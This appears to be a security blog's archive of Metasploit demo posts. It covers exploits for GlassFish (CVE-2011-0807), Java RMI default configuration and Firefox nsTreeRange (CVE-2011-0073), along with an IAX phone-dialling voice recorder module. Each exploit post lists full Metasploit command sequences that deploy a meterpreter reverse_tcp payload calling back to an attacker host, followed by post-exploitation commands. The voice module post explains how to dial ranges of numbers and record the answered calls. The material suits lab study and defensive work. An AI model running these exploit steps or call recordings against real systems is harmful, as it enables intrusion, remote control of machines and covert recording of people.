Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2011-0807 : Sun/Oracle GlassFish Server Authenticated Code Execution Metasploit Demo

Timeline :

Vulnerability discovered by Jason Bowes and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2010-09-23
Coordinated public release of the vulnerability the 2011-04-19
Metasploit PoC provided the 2011-08-04

PoC provided by :

juan vazquez
Joshua Abraham
sinn3r

Reference(s) :

CVE-2011-0807
ZDI-11-137

Affected version(s) :

Sun GlassFish Enterprise Server 2.1, 2.1.1, 3.0.1
Java System Application Server 9.1

Tested on Windows XP SP3 with :

Sun GlassFish Enterprise Server 3.0.1

Description :

This module logs in to an GlassFish Server 3.1 (Open Source or Commercial) instance using a default credential, uploads, and executes commands via deploying a malicious WAR. On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x this module will try to bypass authentication instead by sending lowercase HTTP verbs.

Commands :

use exploit/multi/http/glassfish_deployer
set RHOST 192.168.178.48
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig

Metasploit IAX Telephone Line Voice Scanner Auxiliary module

HD Moore Rapid7 CSO and create of Metasploit has release a new auxiliary module. This module named “Telephone Line Voice Scanner” will permit you to dials a range of phone numbers and record audio from each answered call. This module is only supporting IAX VOIP communication. IAX is most of time used by VOIP provider how are running the open source PBX Asterisk.

You can use this module by charging “auxiliary/scanner/voice/recorder“.

The module has the following options :

  • CALL_TIME : The maximum time in seconds to spent on each call (ring + recording). By default the value is 52 seconds.
  • IAX_CID_NAME : Your caller ID name, optional by default. But some IAX provider require this entry.
  • IAX_CID_NUMBER : Your caller ID number. Could be a phone number or your login depending your provider.
  • IAX_HOST : Your IAX HOST registration server.
  • IAX_USER : Your registration user name (most of the time the same as for SIP).
  • IAX_PASS : Your registration password (most of the time the same as for SIP).
  • OUTPUT_PATH : A local directory to store the resulting audio files.
  • TARGETS : A telephone number, or a list of telephone numbers separated by commas. The phone numbers shouldn’t contain spaces.
Once the module options configured, you can run it. As you can see in the following screenshot, the saved file has as name the phone number with a “.raw” extension.

Also, when you can see when the called phone is ringing and when someone or something has answered.

To read the “.raw” file you will need to convert this file in “.wav” or “.mp3” format. Under Mac OS X I have use Switch Sound File Converter.

Java RMI Server Insecure Default Configuration Java Code Execution

Timeline :

Vulnerability discovered by mihi
Metasploit exploit released the 2011-07-15

PoC provided by :

mihi

Reference(s) :

Oracle Java RMI documentation

Affected version(s) :

All JSE versions

Tested on Windows XP SP3 with :

JSE 7 (build 1.7.0-b147)

Description :

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

Commands :

On windows target box :

cd C:\Program Files\Java\jre7\bin
start rmiregistry.exe

On Metasploit box :

use exploit/multi/misc/java_rmi_server
set RHOST 192.168.178.48
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2011-0073 : Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported to vendor by ZDI the 2011-02-02
Coordinated public release of advisory the 2011-05-09
Metasploit exploit released the 2011-07-10

PoC provided by :

regenrecht
xero

Reference(s) :

CVE-2011-0073
OSVDB-72087
ZDI-11-157
MFSA2011-13

Affected version(s) :

Firefox 3.6.16 and bellow
Firefox 3.5.18 and bellow
Seamonkey 2.0.13 and bellow

Tested on Windows XP SP3 with :

Firefox 3.6.9

Description :

This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x and 3.5.x found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides it’s possible to bypass DEP without the need for a ROP. Sadly this exploit is still either dependent on Java or bound by ASLR because Firefox doesn’t employ any ASLR-free modules anymore.

Commands :

use exploit/windows/browser/mozilla_nstreerange
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig